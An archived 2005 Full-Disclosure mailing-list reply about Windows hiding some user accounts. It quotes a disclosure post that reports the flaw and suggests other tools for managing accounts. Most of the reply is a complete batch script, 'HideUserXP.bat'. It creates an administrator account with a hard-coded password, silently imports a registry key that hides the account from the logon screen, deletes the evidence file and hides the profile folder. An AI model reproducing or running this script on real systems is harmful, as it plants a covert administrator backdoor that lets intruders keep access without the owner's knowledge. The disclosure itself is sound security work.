Re: [Full-disclosure] hidden users on windows?
From: Ill will (xillwillx_at_gmail.com)
Date: 08/04/05
- Previous message: Steve Friedl: "Re: [Full-disclosure] RE: linksys.com laughs"
- In reply to: nabiy: "[Full-disclosure] hidden users on windows?"
- Next in thread: nabiy: "Re: [Full-disclosure] hidden users on windows?"
- Reply: nabiy: "Re: [Full-disclosure] hidden users on windows?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 4 Aug 2005 09:16:55 -0400 To: nabiy <nathan.aguirre@gmail.com>
old news for XP
@echo off
@echo HideUserXP.bat
@echo by illwill http://illmob.org
@echo This will create a hidden user with admin rights in XP
@echo ( hidden meaning that the username wont appear in the logon screen)
@echo To log on to your hidden account, you need to use the Log On To
Windows dialog box by pressing Ctrl + Alt + Delete twice.
@echo Make sure you're logged off all accounts. You can't just switch users.
net user illwill password /add && net localgroup administrators illwill
/add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
attrib +r +a +s +h %SystemDrive%\docume~1\illwill
Exit
On 8/3/05, nabiy <nathan.aguirre@gmail.com> wrote:
>
> Hello,
>
> A security issue has been identified in current versions of windows
> that allows 'hidden' user accounts. The User Account Manager in the
> Windows Control Panel and the 'Welcome Screen' both fail to report
> interactive logons made with the netapi. This security issue has been
> verified on Windows 2000 Professional, Windows XP Home Edition and
> Windows XP Professional. Microsoft was notified of this issue on July
> 28, 2005. The problem is not with the netapi or the ability to create
> users but with the User Account Manager in Windows. It simply fails to
> list all of the users that are on the system.
>
> This issue was noticed while exploring the netapi on windows – users
> created with the netuseradd function failed to show up in both the
> User Account Manager and on the Welcome Screen. The failure to list
> users made with the netapi presents a problem for obvious reasons;
> home users and even administrators expect to see all of the users on
> their system when using these facilities.
>
> The solution in all versions of windows is simple. Do not depend on
> the User Account Manager when managing user accounts on your system.
> Instead, users should use the Local Users and Groups management snapin
> or the net command from the cli.
>
> More information has been documented at http://neworder.box.sk
>
> nathan aguirre
> --
> http://nabiy.sdf1.org . gopher://sdf.lonestar.org/11/users/nabiy
> The Super Dimension Fortress Public Access Unix System
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
-- - illwill http://illmob.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Steve Friedl: "Re: [Full-disclosure] RE: linksys.com laughs"
- In reply to: nabiy: "[Full-disclosure] hidden users on windows?"
- Next in thread: nabiy: "Re: [Full-disclosure] hidden users on windows?"
- Reply: nabiy: "Re: [Full-disclosure] hidden users on windows?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
